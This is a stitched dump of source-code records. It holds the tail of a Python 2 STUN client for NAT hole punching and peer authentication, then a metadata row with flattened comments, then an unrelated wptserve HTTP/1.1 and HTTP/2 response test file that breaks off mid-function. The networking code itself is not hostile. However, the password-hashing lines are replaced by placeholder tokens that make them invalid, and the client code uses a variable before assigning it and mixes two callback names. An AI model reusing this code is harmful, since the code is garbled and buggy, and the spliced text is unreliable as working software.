self.peer_map_callback = None;
def shutdown(self, stun_only=True):
self.authenticated = False;
self.connection_state.active = False; # kills main thread, making the logout auth sequence impossible in its current implementation (get salt/key, then perform request) which needs the main loop.
self.stun_client.disconnect();
if not stun_only:
# disconnect all udp clients...
for key, client in self.client_map.iteritems():
client.disconnect();
self.client_map.clear();
self.peer_map.clear();
del self.used_ports[:]
def restart(self, stun_only=True):
self.shutdown(stun_only);
self.init_tcp_client(self.server_ip, self.server_port);
self.init_stun_listener();
def log_error(self, error_message, extra=None):
err_msg = "[STUN_Server] Line #%s: %s\n\n%s" % (str(traceback.tb_lineno(sys.exc_traceback)), traceback.format_exc(), sys.exc_info());
timestamp = time.time();
date_string = datetime.datetime.fromtimestamp(timestamp).strftime('(%Y-%m-%d) %H:%M:%S')
self.error_log.append((timestamp, date_string, err_msg, extra));
def monitor_response(self, target_object, target_key=None, timeout=20, callback=None, callback_params=None, timeout_callback=None, timeout_callback_params=None):
"""Waits until target is no longer null or timeout occurs. Timeout is in seconds. target_object and target_key should be strings.
If target key is not null, then target_object will be treated as a dictionary (using target_key for the index).
This function is best utilized on its own separate thread."""
# Wait until salt and key have been retrieved or timeout occurs.
time_elapsed = 0;
start_time = time.time();
target_attribute = getattr(self, target_object);
target = None;
connection_state = self.connection_state
#print "Monitoring for %s" % target_object;
# Behold, python lambda expressions in the wild!
if target_key == None:
target = lambda parent: getattr(parent, target_object);
else:
target = lambda parent: getattr(parent, target_object)[target_key];
while time_elapsed < timeout:
time_elapsed = time.time() - start_time;
# check for shutdown.
if not connection_state.active:
return;
# check for target condition
if target(self) != None:
break;
time.sleep(self.thread_sleep_duration);
# Check for timeout.
if target(self) == None:
#print "Timeout on %s" % target_object;
has_timeout_callback = timeout_callback != None;
if has_timeout_callback:
if timeout_callback_params != None:
timeout_callback(timeout_callback_params);
else:
timeout_callback();
return;
#else:
# print "No timeout on %s" % target_object;
# Success, run the callback if one was provided (maybe not if one is only concerned with the timeout event).
if callback != None:
if callback_params != None:
callback(target_object, target_key, callback_params);
else:
callback(target_object, target_key);
def authenticate_thread(self, username, password, callback_object=None, login=True):
# callback_object should have a complete_authentication(success, error_message) method.
self.username = username;
self.password = password;
self.auth_callback = callback_object;
timeout_handler = None;
has_timeout_handler = ((callback_object != None) and (hasattr(callback_object, "handle_timeout")))
if has_timeout_handler:
timeout_handler = callback_object.handle_timeout
# Send salt and dynamic key retrieval request.
self.auth_keys = None;
message = "auth_salt_request %s" % username;
if not self.stun_send_message(message):
#callback_object.complete_authentication(False, "Failed to connect to the server.");
if timeout_handler != None:
timeout_handler("Failed to connect to the server.");
return;
# Wait until salt and key have been retrieved or timeout occurs.
self.monitor_response("auth_keys", None, self.server_response_timeout, self.authenticate_send_credentials, [login, callback_object], timeout_handler, "Server failed to respond.");
def authenticate_send_credentials(self, target_object=None, target_key=None, params=None):
callback_object = None;
if params != None:
callback_object = params[1];
login = params[0]
# hash the password
salt, dynamic_key = self.auth_keys;
if not salt:
if callback_object != None:
callback_object.complete_authentication(False, "Failed to connect to the server.");
return;
salted_password = <PASSWORD>" % (salt, self.password)
hashed_salted_password = hashlib.<PASSWORD>4(<PASSWORD>).hex<PASSWORD>();
#print "hash1: %s\n" % hashed_salted_password;
key_and_hash = "%s%s" % (dynamic_key, hashed_salted_password)
hashed_password = <PASSWORD>(key_and_hash).<PASSWORD>();
#print "hash2: %s" % hashed_password;
self._auth_status = None;
# Send authentication request.
message = "authenticate %s" % json.dumps([self.username, hashed_password, login, json.dumps(self.available_ports), json.dumps(self.used_ports)]);
if not self.stun_send_message(message):
if callback_object != None:
callback_object.complete_authentication(False, "Failed to connect to the server.");
return;
timeout_handler = None;
has_timeout_handler = ((callback_object != None) and (hasattr(callback_object, "handle_timeout")))
if has_timeout_handler:
timeout_handler = callback_object.handle_timeout
self.monitor_response("_auth_status", None, self.server_response_timeout, None, None, timeout_handler);
def registration_completion_handler(self, target_object, target_key, params):
callback_object = params;
registration_handler = None;
has_registration_handler = ((callback_object != None) and (hasattr(callback_object, "complete_registration")))
if has_registration_handler:
callback_object.complete_registration(True, "");
def send_encrypted_registration_request(self, target_object=None, target_key=None, params=None):
username, password, profile_map, callback_object, registration_type = params;
self._registration_status = None;
# Construct the message.
message = "%s" % json.dumps([username, password, profile_map, registration_type]);
# Encrypt the message.
public_key = RSA.importKey(self.registration_key)
message = public_key.encrypt(message, 32);
# Tack on the username in plain text and json_encode again. The STUN Server needs to username to determine which private key to use to decrypt the message.
message = "register %s %s" % (username, message[0]);
if not self.stun_send_message(message):
callback_object.complete_registration(False, "Failed to connect to the server.");
return;
timeout_handler = None;
has_timeout_handler = ((callback_object != None) and (hasattr(callback_object, "handle_timeout")))
if has_timeout_handler:
timeout_handler = callback_object.handle_timeout
# Wait until salt and key have been retrieved or timeout occurs.
self.monitor_response("_registration_status", None, self.server_response_timeout, self.registration_completion_handler, callback_object, timeout_handler);
def register_thread(self, username, password, profile_map, callback_object=None, registration_type="permanent"):
# callback_object should have a complete_registration(success, error_message) method.
self.username = username;
self.password = password;
self.profile_map = profile_map;
self.register_callback = callback_object;
self.registration_key = None;
message = "register_key %s" % username;
if not self.stun_send_message(message):
callback_object.complete_registration(False, "Failed to connect to the server.");
return;
timeout_handler = None;
has_timeout_handler = ((callback_object != None) and (hasattr(callback_object, "handle_timeout")))
if has_timeout_handler:
timeout_handler = callback_object.handle_timeout
params = [username, password, profile_map, callback_object, registration_type];
self.monitor_response("registration_key", None, self.server_response_timeout, self.send_encrypted_registration_request, params, timeout_handler);
def authenticate(self, username, password, callback_object=None, login=True):
"""Non-blocking. Sends a user authentication request."""
# Spawn a separate thread to perform authentication. This is to keep from blocking the caller, since a callback is expected to handle results.
Thread(target=self.authenticate_thread, args=(username, password, callback_object, login)).start();
def maintain_authentication(self, callback_object=None):
#self.authentication_monitor_object
username = self.username
password = self.password
last_auth = self.last_auth
self.re_auth_ready = True;
while self.authenticated:
last_reauth = self.keep_alive_monitor.last_reauth_attempt;
now = time.time();
ready_time = last_reauth + (self.auth_keep_alive_multiplier * self.auth_keep_alive_interval);
time_for_another_reauth_attempt = now >= ready_time;
# By re_auth_ready, I'm saying a re-authentication attempt isn't currently in progress. Yes, it's a poorly named variable.
# I'll need to rename it something better. Maybe later (trademark).
if self.re_auth_ready and time_for_another_reauth_attempt:
self.re_auth_ready = False;
self.authenticate(self.username, self.password, self.keep_alive_monitor);
time.sleep(self.thread_sleep_duration);
def logout(self):
self.authenticated = False;
self.authenticate(self.username, self.password, self.keep_alive_monitor, False);
def register(self, username, password, profile_map, callback_object=None, registration_type="permanent"):
"""Non-blocking. Sends a user registration request.
Only type of registration available for now is 'permanent'. Temporary to come later, maybe (for guests/'unregistered' users).
Note that profile_map should be a json-encoded string (you can store arbitrary data here)."""
# Spawn a separate thread to perform registration. This is to keep from blocking the caller, since a callback is expected to handle results.
Thread(target=self.register_thread, args=(username, password, profile_map, callback_object, registration_type)).start();
def init_tcp_client(self, server_ip, server_port, buffer_size=1024):
self.server_ip = server_ip;
self.server_port = server_port;
self.stun_client = tcp.TCP_Client(server_ip, server_port, buffer_size);
def init_stun_listener(self):
self.connection_state = ConnectionState(True);
Thread(target=self.stun_listen_loop).start();
def stun_send_message(self, message, json_encode=False, prepare=True):
try:
self.stun_client.send_message(message, json_encode, prepare);
return True;
except:
return False;
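# Main receive loop: pops messages from the STUN server connection and dispatches them by message type (peer_map, hole_punch, auth_response, ...).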
def stun_listen_loop(self):
connection_state = self.connection_state
message_object = None
while self.connection_state.active:
try:
message_object = self.stun_client.pop_message();
is_valid_message = ((message_object != None) and (len(message_object) > 2));
self.master_log.append(message_object);
if is_valid_message:
message = message_object[2];
message_type, message_body = message.split(" ",1);
if message_type not in self.message_log_map:
self.message_log_map[message_type] = [];
self.message_log_map[message_type].append(message_object);
#print "MESSAGE: %s\n" % message_object;
if(message_type == "peer_map"):
# peer data should be [[peer_username, public_profile_map], ...]
message_data = json.loads(message_body);
self.update_peer_map(message_data);
if self.peer_map_callback != None:
self.peer_map_callback(self.peer_map);
elif(message_type == "hole_punch"):
peer_allowed = True;
# message body should be [listen_ip, listen_port, peer_ip, peer_port, peer_username, buffer_size]
message_data = json.loads(message_body);
listen_ip, listen_port, peer_ip, peer_port, peer_username, buffer_size = message_data
port_in_use = False;
# Ensure port isn't already in use.
if listen_port in self.used_ports:
port_in_use = True;
self.stun_send_message("hole_punch_reject %s" % json.dumps([listen_ip, listen_port, self.username, peer_ip, peer_port, peer_username, buffer_size, port_in_use]));
continue;
message_body = json.dumps([listen_ip, listen_port, self.username, peer_ip, peer_port, peer_username, buffer_size, port_in_use]);
if(self.peer_block_manager != None):
peer_allowed = self.peer_block_manager.is_peer_allowed(message_data);
if(peer_allowed):
self.stun_send_message("hole_punch_ack %s" % message_body);
else:
self.stun_send_message("hole_punch_reject %s" % message_body);
elif(message_type == "hole_punch_request_rejected"):
# Deals with requests that fail due to lack of authentication (this client or the target client) or target client doesn't exist.
# message_body should be [listen_ip, listen_port, self.username, target_ip, target_port, username, buffer_size]
fail_type, target_username, error_message = json.loads(message_body);
if target_username in self.callback_map:
callback_object = self.callback_map[target_username];
callback_object.complete_connection(target_username, False, error_message);
del self.callback_map[target_username];
elif(message_type == "hole_punch_rejected"):
# message_body should be [listen_ip, listen_port, self.username, target_ip, target_port, username, buffer_size]
message_data = json.loads(message_body);
listen_ip, listen_port, self.username, target_ip, target_port, username, buffer_size = message_data
client_key = "%s-%s-%s" % (target_ip, target_port, username);
callback_object = None;
if client_key in self.callback_map:
callback_object = self.callback_map[client_key]
if callback_object != None:
callback_object.complete_connection(client_key, False, "Peer rejected the connection request.");
del self.callback_map[client_key];
elif(message_type == "init_hole_punch"):
try:
listen_ip, listen_port, peer_ip, peer_port, peer_username, buffer_size = json.loads(message_body);
if listen_port not in self.used_ports:
self.used_ports.append(listen_port);
# No else. We're just going to hope there's no way for that if to not run, and that we're just being half-assed at feeling paranoid.
# My mind is feeling like it's been twisted into a few knots at this point, to be honest.
Thread(target=self.connect_to_remote_peer, args=(listen_ip, listen_port, peer_ip, peer_port, buffer_size, peer_username)).start();
client_key = "%s_%s_%s" % (peer_ip, peer_port, peer_username)
if peer_username in self._holepunch_status:
self._holepunch_status[peer_username] = True;
if peer_username in self.callback_map:
self.callback_map[client_key] = self.callback_map[peer_username];
del self.callback_map[peer_username]
except Exception as e:
self.log_error(e);
elif(message_type == "auth_keys"):
# message body should be [salt, dynamic_key]
self.auth_keys = json.loads(message_body);
elif(message_type == "auth_response"):
# message body should be [success, username, profile_map, login, error_message]
success, username, profile_map, login, error_message = json.loads(message_body);
self._auth_status = True;
new_auth = not self.authenticated;
if success:
if login:
self.authenticated = True;
self.auth_keep_alive_multiplier = 1;
self.last_auth = time.time();
self.username = username;
self.profile_map = profile_map;
if new_auth:
Thread(target=self.maintain_authentication).start();
else:
self.authenticated = False;
self.auth_keep_alive_multiplier = 1;
self.last_auth = time.time();
self.username = username;
self.profile_map = profile_map;
if self.auth_callback != None:
self.auth_callback.complete_authentication(success, error_message);
elif(message_type == "registration_key"):
# message body should be "public_key"
self.registration_key = message_body;
elif(message_type == "registration_response"):
# message body should be [success, username, profile_map, error_message]
success, username, profile_map, error_message = json.loads(message_body);
if success:
self.username = username;
self.profile_map = profile_map;
self._registration_status = True;
if self.registration_callback != None:
self.register_callback.complete_registration(success, error_message);
except Exception as exc:
self.log_error(exc, message_object);
time.sleep(self.thread_sleep_duration);
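# Rebuild the cached peer list from a "peer_map" message, dropping peers that are no longer reported by the server.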
def update_peer_map(self, packet):
username_list = [];
current_username_list = self.peer_map.keys();
for user_block in packet:
peer_username, profile_map = user_block;
valid_username = ((peer_username != None) and (peer_username.replace(" ","").replace("\t","").replace("\n","").replace("\r","") != ""));
if valid_username:
username_list.append(peer_username);
self.peer_map[peer_username] = user_block;
remove_username_list = [];
for username in current_username_list:
if username not in username_list:
remove_username_list.append(username);
for username in remove_username_list:
del self.peer_map[username];
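# Pick a free local port by scanning the configured port ranges from the last range (and highest port) downward; returns (ip, port) or None if every allowed port is in use.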
def auto_select_local_endpoint(self):
listen_ip = self.local_ip;
range_count = len(self.available_ports);
for i in range(0, range_count):
x = range_count - (1 + i)
port_range = self.available_ports[x]
port_count = port_range[1] - port_range[0]
for j in range(0, port_count):
port = port_range[1] - j;
if port not in self.used_ports:
return (listen_ip, port);
return None;
def connect_to_peer(self, target_username, buffer_size, callback_object=None, listen_ip = None, listen_port = None):
""" callback_object should have a complete_connection(target, success, error_message) method where success is True or False.
Extract info with:
ip, port, username = target.split("-",2)
Returns False if it fails to send request message (e.g. peer is blocked or connection to server failed.).
"""
local_endpoint_not_specified = ((listen_ip == None) or (listen_port == None))
if local_endpoint_not_specified:
try:
listen_ip, listen_port = self.auto_select_local_endpoint();
except:
callback_object.complete_connection(client_key, False, "All available allowed local ports are already in use. Cannot initiate connection to peer.");
return False;
# Disallow connecting to yourself. What are you trying to pull?
if self.username == target_username:
callback_object.complete_connection(client_key, False, "You cannot connect to yourself.");
return False;
# disallow connecting to blocked peers.
if(self.peer_block_manager != None):
peer_allowed = self.peer_block_manager.is_peer_allowed([target_username, buffer_size]);
if not peer_allowed:
callback_object.complete_connection(client_key, False, "This peer has been blocked.");
return False;
client_key = target_username;
self.callback_map[client_key] = callback_object;
self._holepunch_status[client_key] = None;
# Start hole_punch process.
message = "request_hole_punch %s" % json.dumps([listen_ip, listen_port, self.username, target_username, buffer_size])
if not self.stun_send_message(message):
callback_object.complete_connection(client_key, False, "Failed to connect to the server.");
del self.callback_map[client_key];
return False;
timeout_handler = None;
has_timeout_handler = ((callback_object != None) and (hasattr(callback_object, "handle_timeout")))
if has_timeout_handler:
timeout_handler = callback_object.handle_timeout
# Wait until salt and key have been retrieved or timeout occurs.
Thread(target=self.monitor_response, args=("_holepunch_status", client_key, self.server_response_timeout, None, None, timeout_handler)).start();
return True;
def connect_to_remote_peer(self, local_ip, local_port, target_ip, target_port, buffer_size, username):
"""Warning: Internal use only!"""
print "Connecting to remote peer."
udp_client = udp.UDP_Client(True, local_ip, local_port, target_ip, target_port, buffer_size, True);
client_key = "%s_%s_%s" % (target_ip, target_port, username)
callback_object = None;
if client_key in self.callback_map:
callback_object = self.callback_map[client_key]
if self.hole_punch(udp_client, self.hole_punch_max_attempts, self.hole_punch_timeout):
print "Hole-punch succeeded."
if callback_object != None:
callback_object.complete_connection(username, True, client_key);
self.client_map[client_key] = udp_client; # success, add it to the map.
else:
print "Hole-punch failed."
# remove that port from the used ports list.
port_count = len(self.used_ports);
for i in range(0, port_count):
if self.used_ports[i] == local_port:
del self.used_ports[i]
break;
# run the callback, if there is one.
if callback_object != None:
callback_object.complete_connection(client_key, False, "Failed to connect to peer.");
def hole_punch_send_loop(self, udp_client, maximum_retries=20, delay=0.5):
for i in range(0, maximum_retries):
udp_client.send_message("syn", False, False);
time.sleep(delay);
# Create and return a udp socket that has established connection with the target peer, or None if it fails.
def hole_punch(self, udp_client, maximum_retries=20, timeout=20):
print "Performing hole-punch."
delay = 0.5
result = False;
connection_state = self.connection_state
Thread(target=self.hole_punch_send_loop, args=(udp_client, maximum_retries, delay)).start();
start_time = time.time();
for i in range(0, maximum_retries):
time.sleep(delay)
if not connection_state.active:
# give up and close it out.
udp_client.disconnect();
print "Fail 1";
return False;
packet = "";
try:
packet = udp_client.pop_message();
except:
pass;
if packet != None:
print "hole_punch_response: " + str(packet);
if len(packet) >= 3:
# check the packet.
if(packet[2] == "syn"):
udp_client.send_message("ack", False, False); # send acknowledge
elif(packet[2] == "ack"):
udp_client.send_message("ack2", False, False); # send ack ack and return socket.
result = True;
print "Success 1";
break;
elif(packet[2] == "ack2"):
result = True; # ack ack received, return socket.
print "Success 2";
break;
# check for timeout
time_elapsed = time.time() - start_time;
if(time_elapsed >= timeout):
print "Fail 2";
break;
return result;
class KeepAliveMonitor:
def __init__(self, parent):
self.parent = parent;
self.last_reauth_attempt = time.time();
def complete_authentication(self, success, error_message=""):
self.parent.re_auth_ready = True;
self.last_reauth_attempt = time.time();
if not success:
self.parent.auth_keep_alive_multiplier += 1;
def handle_timeout(self, params=None):
self.last_reauth_attempt = time.time();
self.parent.re_auth_ready = True;
self.parent.auth_keep_alive_multiplier += 1; | en | 0.722216 | #import buffered_message; # publickey = RSA.importKey(key_string) # ************* # EXAMPLE USAGE # ************* import socket import tcp import udp import stun_client import time start_listening = True local_ip = socket.gethostbyname(socket.gethostname()) local_port = 30779 server_ip = socket.gethostbyname(socket.gethostname()) server_port = 30788 socket_timeout = 3.0 peer_block_manager = None client = stun_client.STUN_Client(start_listening, local_ip, local_port, server_ip, server_port, socket_timeout, peer_block_manager) # Set your available listening port ranges client.available_ports = [[35000, 35100], [36500, 36700],] # Register a user acccount with the stun server. class RegisterCallback: def __init__(self): self.error_message = "" self.success = None def handle_timeout(self, params=None): self.success = False self.error_message = "Registration request to server has timed-out." def complete_registration(self, success, error_message=""): self.success = success self.error_message = error_message username = "test_user" password = "<PASSWORD>" profile_map = {} callback_object = RegisterCallback() registration_type = "permanent" client.register(username, password, profile_map, callback_object, registration_type) response_check_interval = 0.5; while callback_object.success == None: time.sleep(response_check_interval) if not callback_object.success: print "Error: %s" % callback_object.error_message exit() # Login with username and password. class AuthCallback: def __init__(self): self.error_message = "" self.success = None def handle_timeout(self, params=None): self.success = False self.error_message = "Authentication request to server has timed-out." def complete_authentication(self, success, error_message=""): self.success = success self.error_message = error_message callback_object = AuthCallback() login = True # this authentication is to login. It'd be False if we wanted to log out. client.authenticate(username, password, callback_object, login) while callback_object.success == None: time.sleep(response_check_interval) if not callback_object.success: print "Error: %s" % callback_object.error_message exit() # Now we can access the list of peers connected to the server. # Alternatively, assign a function reference to client.peer_map_callback (argument will be a reference to client.peer_map) to be notified of peer list updates as they are received. # # sample peer_map: # ["test_user":["test_user", None], "another_user":["another_user", None],] # Get a peer from the list. peer_username = None; for _username, data in client.peer_map.iteritems(): if username != _username: peer_username = _username break # Connect to that peer (hole-punch) class ConnectionCallback: def __init__(self): self.error_message = "" self.success = None self.client_key = None def handle_timeout(self, params=None): self.success = False self.error_message = "Connection request to server has timed-out." 
def complete_connection(self, peer_username, success, error_message=""): self.success = success if success: self.client_key = error_message else: self.error_message = error_message buffer_size = 128 callback_object = ConnectionCallback() client.connect_to_peer(peer_username, buffer_size, callback_object) while callback_object.success == None: time.sleep(response_check_interval) if not callback_object.success: print "Error: %s" % callback_object.error_message exit() client_key = callback_object.client_key udp_client = client.client_map[client_key] # Now you can communicate with that peer. udp_client.send_message("Greetings!") udp_client.pop_all_messages() # 15 seconds is the limit for authentication requests. It's just a magic number like many of these timeout values. # login will expire after this many seconds passes without successful keep-alive authentication # Avoid hammering the server if it's down. Will increment every time re-auth fails, returns to 1 upon successful authentication. # all messages recieved # log per message type. # this will handle callbacks for keeping track of whether the user's authentication expires (namely from losing connection to the server.) # Server response flags. Set to None when sending a request; they are flipped to True upon receiving a response. Used for determining response time-out. # Private. Internal use only. # list of ranges, e.g. ports 34000 - 34100 # dictionary of active udp connections (hole-punched) # Initialize TCP client. # Start listening to the stun server. # kills main thread, making the logout auth sequence impossible in its current implementation (get salt/key, then perform request) which needs the main loop. # disconnect all udp clients... #%s: %s\n\n%s" % (str(traceback.tb_lineno(sys.exc_traceback)), traceback.format_exc(), sys.exc_info()); Waits until target is no longer null or timeout occurs. Timeout is in seconds. target_object and target_key should be strings. If target key is not null, then target_object will be treated as a dictionary (using target_key for the index). This function is best utilized on its own separate thread. # Wait until salt and key have been retrieved or timeout occurs. #print "Monitoring for %s" % target_object; # Behold, python lambda expressions in the wild! # check for shutdown. # check for target condition # Check for timeout. #print "Timeout on %s" % target_object; #else: # print "No timeout on %s" % target_object; # Success, run the callback if one was provided (maybe not if one is only concerned with the timeout event). # callback_object should have a complete_authentication(success, error_message) method. # Send salt and dynamic key retrieval request. #callback_object.complete_authentication(False, "Failed to connect to the server."); # Wait until salt and key have been retrieved or timeout occurs. # hash the password #print "hash1: %s\n" % hashed_salted_password; #print "hash2: %s" % hashed_password; # Send authentication request. # Construct the message. # Encrypt the message. # Tack on the username in plain text and json_encode again. The STUN Server needs to username to determine which private key to use to decrypt the message. # Wait until salt and key have been retrieved or timeout occurs. # callback_object should have a complete_registration(success, error_message) method. Non-blocking. Sends a user authentication request. # Spawn a separate thread to perform authentication. This is to keep from blocking the caller, since a callback is expected to handle results. 
#self.authentication_monitor_object # By re_auth_ready, I'm saying a re-authentication attempt isn't currently in progress. Yes, it's a poorly named variable. # I'll need to rename it something better. Maybe later (trademark). Non-blocking. Sends a user registration request. Only type of registration available for now is 'permanent'. Temporary to come later, maybe (for guests/'unregistered' users). Note that profile_map should be a json-encoded string (you can store arbitrary data here). # Spawn a separate thread to perform registration. This is to keep from blocking the caller, since a callback is expected to handle results. #print "MESSAGE: %s\n" % message_object; # peer data should be [[peer_username, public_profile_map], ...] # message body should be [listen_ip, listen_port, peer_ip, peer_port, peer_username, buffer_size] # Ensure port isn't already in use. # Deals with requests that fail due to lack of authentication (this client or the target client) or target client doesn't exist. # message_body should be [listen_ip, listen_port, self.username, target_ip, target_port, username, buffer_size] # message_body should be [listen_ip, listen_port, self.username, target_ip, target_port, username, buffer_size] # No else. We're just going to hope there's no way for that if to not run, and that we're just being half-assed at feeling paranoid. # My mind is feeling like it's been twisted into a few knots at this point, to be honest. # message body should be [salt, dynamic_key] # message body should be [success, username, profile_map, login, error_message] # message body should be "public_key" # message body should be [success, username, profile_map, error_message] callback_object should have a complete_connection(target, success, error_message) method where success is True or False. Extract info with: ip, port, username = target.split("-",2) Returns False if it fails to send request message (e.g. peer is blocked or connection to server failed.). # Disallow connecting to yourself. What are you trying to pull? # disallow connecting to blocked peers. # Start hole_punch process. # Wait until salt and key have been retrieved or timeout occurs. Warning: Internal use only! # success, add it to the map. # remove that port from the used ports list. # run the callback, if there is one. # Create and return a udp socket that has established connection with the target peer, or None if it fails. # give up and close it out. # check the packet. # send acknowledge # send ack ack and return socket. # ack ack received, return socket. # check for timeout | 2.682485 | 3 |
tools/wptserve/tests/functional/test_response.py | qanat/wpt | 1 | 8552 | import os
import unittest
import json
import types
from http.client import BadStatusLine
from io import BytesIO
import pytest
wptserve = pytest.importorskip("wptserve")
from .base import TestUsingServer, TestUsingH2Server, doc_root
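# Replacement for the response writer's end_headers used by the HEAD-request tests:
# it emits the body as the value of an "X-Body" header so the tests can observe
# whether a body was (or was not) written for a HEAD request.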
def send_body_as_header(self):
if self._response.add_required_headers:
self.write_default_headers()
self.write("X-Body: ")
self._headers_complete = True
class TestResponse(TestUsingServer):
def test_head_without_body(self):
@wptserve.handlers.handler
def handler(request, response):
response.writer.end_headers = types.MethodType(send_body_as_header,
response.writer)
return [("X-Test", "TEST")], "body\r\n"
route = ("GET", "/test/test_head_without_body", handler)
self.server.router.register(*route)
resp = self.request(route[1], method="HEAD")
self.assertEqual("6", resp.info()['Content-Length'])
self.assertEqual("TEST", resp.info()['x-Test'])
self.assertEqual("", resp.info()['x-body'])
def test_head_with_body(self):
@wptserve.handlers.handler
def handler(request, response):
response.send_body_for_head_request = True
response.writer.end_headers = types.MethodType(send_body_as_header,
response.writer)
return [("X-Test", "TEST")], "body\r\n"
route = ("GET", "/test/test_head_with_body", handler)
self.server.router.register(*route)
resp = self.request(route[1], method="HEAD")
self.assertEqual("6", resp.info()['Content-Length'])
self.assertEqual("TEST", resp.info()['x-Test'])
self.assertEqual("body", resp.info()['X-Body'])
def test_write_content_no_status_no_header(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_status_no_header", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 200
assert resp.read() == resp_content
assert resp.info()["Content-Length"] == str(len(resp_content))
assert "Date" in resp.info()
assert "Server" in resp.info()
def test_write_content_no_headers(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_status(201)
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_headers", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 201
assert resp.read() == resp_content
assert resp.info()["Content-Length"] == str(len(resp_content))
assert "Date" in resp.info()
assert "Server" in resp.info()
def test_write_content_no_status(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_header("test-header", "test-value")
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_status", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 200
assert resp.read() == resp_content
assert sorted(x.lower() for x in resp.info().keys()) == sorted(['test-header', 'date', 'server', 'content-length'])
def test_write_content_no_status_no_required_headers(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.add_required_headers = False
response.writer.write_header("test-header", "test-value")
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_status_no_required_headers", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 200
assert resp.read() == resp_content
assert resp.info().items() == [('test-header', 'test-value')]
def test_write_content_no_status_no_headers_no_required_headers(self):
resp_content = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
response.add_required_headers = False
response.writer.write_content(resp_content)
route = ("GET", "/test/test_write_content_no_status_no_headers_no_required_headers", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 200
assert resp.read() == resp_content
assert resp.info().items() == []
def test_write_raw_content(self):
resp_content = b"HTTP/1.1 202 Giraffe\n" \
b"X-TEST: PASS\n" \
b"Content-Length: 7\n\n" \
b"Content"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_raw_content(resp_content)
route = ("GET", "/test/test_write_raw_content", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 202
assert resp.info()["X-TEST"] == "PASS"
assert resp.read() == b"Content"
def test_write_raw_content_file(self):
@wptserve.handlers.handler
def handler(request, response):
with open(os.path.join(doc_root, "test.asis"), 'rb') as infile:
response.writer.write_raw_content(infile)
route = ("GET", "/test/test_write_raw_content", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 202
assert resp.info()["X-TEST"] == "PASS"
assert resp.read() == b"Content"
def test_write_raw_none(self):
@wptserve.handlers.handler
def handler(request, response):
with pytest.raises(ValueError):
response.writer.write_raw_content(None)
route = ("GET", "/test/test_write_raw_content", handler)
self.server.router.register(*route)
self.request(route[1])
def test_write_raw_contents_invalid_http(self):
resp_content = b"INVALID HTTP"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_raw_content(resp_content)
route = ("GET", "/test/test_write_raw_content", handler)
self.server.router.register(*route)
with pytest.raises(BadStatusLine) as e:
self.request(route[1])
assert str(e.value) == resp_content.decode('utf-8')
class TestH2Response(TestUsingH2Server):
def test_write_without_ending_stream(self):
data = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
headers = [
('server', 'test-h2'),
('test', 'PASS'),
]
response.writer.write_headers(headers, 202)
response.writer.write_data_frame(data, False)
# Should detect stream isn't ended and call `writer.end_stream()`
route = ("GET", "/h2test/test", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 202
assert [x for x in resp.headers.items()] == [('server', 'test-h2'), ('test', 'PASS')]
assert resp.content == data
def test_set_error(self):
@wptserve.handlers.handler
def handler(request, response):
response.set_error(503, message="Test error")
route = ("GET", "/h2test/test_set_error", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 503
assert json.loads(resp.content) == json.loads("{\"error\": {\"message\": \"Test error\", \"code\": 503}}")
def test_file_like_response(self):
@wptserve.handlers.handler
def handler(request, response):
content = BytesIO(b"Hello, world!")
response.content = content
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 200
assert resp.content == b"Hello, world!"
def test_list_response(self):
@wptserve.handlers.handler
def handler(request, response):
response.content = ['hello', 'world']
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 200
assert resp.content == b"helloworld"
def test_content_longer_than_frame_size(self):
@wptserve.handlers.handler
def handler(request, response):
size = response.writer.get_max_payload_size()
content = "a" * (size + 5)
return [('payload_size', size)], content
route = ("GET", "/h2test/test_content_longer_than_frame_size", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 200
payload_size = int(resp.headers['payload_size'])
assert payload_size
assert resp.content == b"a" * (payload_size + 5)
def test_encode(self):
@wptserve.handlers.handler
def handler(request, response):
response.encoding = "utf8"
t = response.writer.encode("hello")
assert t == b"hello"
with pytest.raises(ValueError):
response.writer.encode(None)
route = ("GET", "/h2test/test_content_longer_than_frame_size", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 200
def test_raw_header_frame(self):
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_raw_header_frame([
(':status', '204'),
('server', 'TEST-H2')
], end_headers=True)
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 204
assert resp.headers['server'] == 'TEST-H2'
assert resp.content == b''
def test_raw_data_frame(self):
@wptserve.handlers.handler
def handler(request, response):
response.write_status_headers()
response.writer.write_raw_data_frame(data=b'Hello world', end_stream=True)
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.content == b'Hello world'
def test_raw_header_continuation_frame(self):
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_raw_header_frame([
(':status', '204')
])
response.writer.write_raw_continuation_frame([
('server', 'TEST-H2')
], end_headers=True)
